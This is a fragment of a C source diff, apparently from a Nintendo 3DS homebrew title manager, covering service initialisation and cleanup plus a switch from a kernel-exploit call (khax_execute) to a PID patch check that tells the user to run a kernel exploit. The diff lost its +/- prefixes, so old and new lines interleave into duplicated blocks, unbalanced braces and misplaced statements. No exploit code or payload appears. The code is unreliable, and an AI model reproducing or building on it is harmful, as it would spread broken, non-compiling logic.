free(soc_buffer);
soc_buffer = NULL;
for(u32 i = 0; i < exitFuncCount; i++) {
if(exitFuncs[i] != NULL) {
exitFuncs[i]();
exitFuncs[i] = NULL;
}
soc_initialized = false;
}
if(httpc_initialized) {
httpcExit();
httpc_initialized = false;
}
exitFuncCount = 0;
if(pxidev_initialized) {
pxiDevExit();
pxidev_initialized = false;
}
if(ptmu_initialized) {
ptmuExit();
ptmu_initialized = false;
}
if(ac_initialized) {
acExit();
ac_initialized = false;
}
if(cfgu_initialized) {
cfguExit();
cfgu_initialized = false;
}
if(am_initialized) {
amExit();
am_initialized = false;
if(soc_buffer != NULL) {
free(soc_buffer);
soc_buffer = NULL;
}
}
#define INIT_SERVICE(initStatement, exitFunc) (R_SUCCEEDED(res = (initStatement)) && (exitFuncs[exitFuncCount++] = (exitFunc)))
Result init_services() {
Result res = 0;
Handle tempAM = 0;
if(R_SUCCEEDED(res = srvGetServiceHandle(&tempAM, "am:net"))) {
svcCloseHandle(tempAM);
soc_buffer = memalign(0x1000, 0x100000);
if(soc_buffer != NULL) {
Handle tempAM = 0;
if(R_SUCCEEDED(res = srvGetServiceHandle(&tempAM, "am:net"))) {
svcCloseHandle(tempAM);
if(R_SUCCEEDED(res = amInit()) && (am_initialized = true)
&& R_SUCCEEDED(res = cfguInit()) && (cfgu_initialized = true)
&& R_SUCCEEDED(res = acInit()) && (ac_initialized = true)
&& R_SUCCEEDED(res = ptmuInit()) && (ptmu_initialized = true)
&& R_SUCCEEDED(res = pxiDevInit()) && (pxidev_initialized = true)
&& R_SUCCEEDED(res = httpcInit(0)) && (httpc_initialized = true)) {
soc_buffer = memalign(0x1000, 0x100000);
if(soc_buffer != NULL) {
if(R_SUCCEEDED(res = socInit(soc_buffer, 0x100000))) {
soc_initialized = true;
}
} else {
res = R_FBI_OUT_OF_MEMORY;
}
if(INIT_SERVICE(amInit(), amExit)
&& INIT_SERVICE(cfguInit(), cfguExit)
&& INIT_SERVICE(acInit(), acExit)
&& INIT_SERVICE(ptmuInit(), ptmuExit)
&& INIT_SERVICE(pxiDevInit(), pxiDevExit)
&& INIT_SERVICE(httpcInit(0), httpcExit)
&& INIT_SERVICE(socInit(soc_buffer, 0x100000), (void (*)()) socExit));
}
} else {
res = R_FBI_OUT_OF_MEMORY;
}
if(R_FAILED(res)) {
@ -97,23 +112,7 @@ Result init_services() {
return res;
}
void cleanup() {
clipboard_clear();
task_exit();
ui_exit();
screen_exit();
if(old_time_limit != UINT32_MAX) {
APT_SetAppCpuTimeLimit(old_time_limit);
}
cleanup_services();
romfsExit();
gfxExit();
}
static u32 old_time_limit = UINT32_MAX;
void init() {
gfxInitDefault();
@ -125,25 +124,11 @@ void init() {
}
if(R_FAILED(init_services())) {
const devoptab_t* oldStdOut = devoptab_list[STD_OUT];
const devoptab_t* oldStdErr = devoptab_list[STD_ERR];
consoleInit(GFX_TOP, NULL);
util_store_console_std();
if(!khax_execute()) {
printf("Press any key to exit.\n");
util_panic_quiet();
if(!attempt_patch_pid()) {
util_panic("Kernel backdoor not installed.\nPlease run a kernel exploit and try again.\n");
return;
}
devoptab_list[STD_OUT] = oldStdOut;
devoptab_list[STD_ERR] = oldStdErr;
gfxSetScreenFormat(GFX_TOP, GSP_BGR8_OES);
gfxSetDoubleBuffering(GFX_TOP, true);
Result initRes = init_services();
if(R_FAILED(initRes)) {
util_panic("Failed to initialize services: %08lX", initRes);
@ -167,6 +152,26 @@ void init() {
task_init();
}
void cleanup() {
clipboard_clear();
task_exit();
ui_exit();
screen_exit();
if(old_time_limit != UINT32_MAX) {
APT_SetAppCpuTimeLimit(old_time_limit);
}
osSetSpeedupEnable(false);
cleanup_services();
romfsExit();
gfxExit();
}
int main(int argc, const char* argv[]) {
if(argc > 0) {
util_set_3dsx_path(argv[0]);